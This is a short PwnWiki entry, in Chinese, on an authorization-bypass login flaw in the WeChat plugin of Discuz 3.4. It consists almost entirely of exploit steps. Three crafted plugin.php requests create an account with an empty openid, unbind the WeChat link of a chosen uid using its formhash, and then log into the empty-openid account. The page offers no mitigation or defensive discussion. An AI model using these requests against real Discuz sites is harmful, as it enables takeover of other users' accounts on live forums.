Discuz3.4越權登錄漏洞
From PwnWiki
漏洞利用
通過/plugin.php?id=wechat:wechat&ac=wxregister&username={name}這種方式可以使openid為空, 但註冊的是一個新的賬號。
解除指定uid綁定的微信:
/plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={formhash}
登陸第一個openid為空的賬號:/plugin.php?id=wechat:wechat&ac=wxregister
